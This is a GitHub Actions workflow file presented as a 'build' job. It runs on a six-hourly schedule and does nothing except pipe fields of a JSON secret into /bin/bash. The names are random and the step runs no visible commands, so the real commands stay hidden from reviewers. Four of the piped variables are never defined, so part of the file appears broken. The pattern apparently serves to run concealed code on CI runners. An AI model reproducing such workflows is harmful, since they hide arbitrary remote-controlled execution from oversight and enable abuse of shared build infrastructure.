name: snowsam7
on:
  workflow_dispatch:
  schedule:
    - cron: '6 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: snowsam7
        env:
          lxcp91066: ${{ secrets.lxcp91066 }}
        run: |
          echo $lxcp91066 | jq -r .jjnk01 | /bin/bash
          echo $uf3 | jq -r .vahat517 | /bin/bash
          echo $rgef8 | jq -r .asqcq235 | /bin/bash
          echo $c2 | jq -r .z90477 | /bin/bash
          echo $rrojk43 | jq -r .aa1048 | /bin/bash

